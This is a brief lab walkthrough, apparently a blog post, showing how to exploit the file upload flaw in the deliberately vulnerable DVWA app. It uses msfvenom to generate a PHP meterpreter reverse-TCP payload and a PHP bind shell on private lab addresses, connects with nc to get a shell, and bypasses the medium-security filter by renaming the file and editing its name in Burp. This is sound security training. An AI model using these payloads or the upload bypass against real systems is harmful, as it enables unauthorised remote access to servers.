DVWA 1.9+: File Upload with Metasploit Venom
This article is about file upload as a security flaw. In previous articles we’ve setup our lab and made several exploitations against our target.
You can view those articles here.
File Upload — Low Security
Meterpreter
$ msfvenom -h
$ msfvenom -l payloads | grep php
View more info:
$ msfvenom -p php/meterpreter/reverse_tcp --list-options
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.231.107 LPORT=4444 -o php_venom.php
Remove ‘/*’ from beginning of file.
Upload
Prepare MSF
Execute and
Shell
$ msfvenom -p php/bind_php — list-options
$ msfvenom -p php/bind_php LHOST=192.168.231.107 LPORT=4444 -o php_bind.php
remove ‘/*’ from file.
Execute
$ nc 192.168.231.110 4444
Got a shell
File Upload — Medium Security
Change DVWA Security to medium and try again.
$ cp php_venom.php php_venom.php.jpg
Try to run:
Let’s hack our file upload. Burp suite with Intercetp on
Return DVWA and upload file again. Go to Burp and change filename:
Then press Forward and get back to the Browser to see a success file upload. Go to hackable/upload and see php_venom.php updated. We’ve bypassed the medium security protection!
Conclusion
Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another vector of attack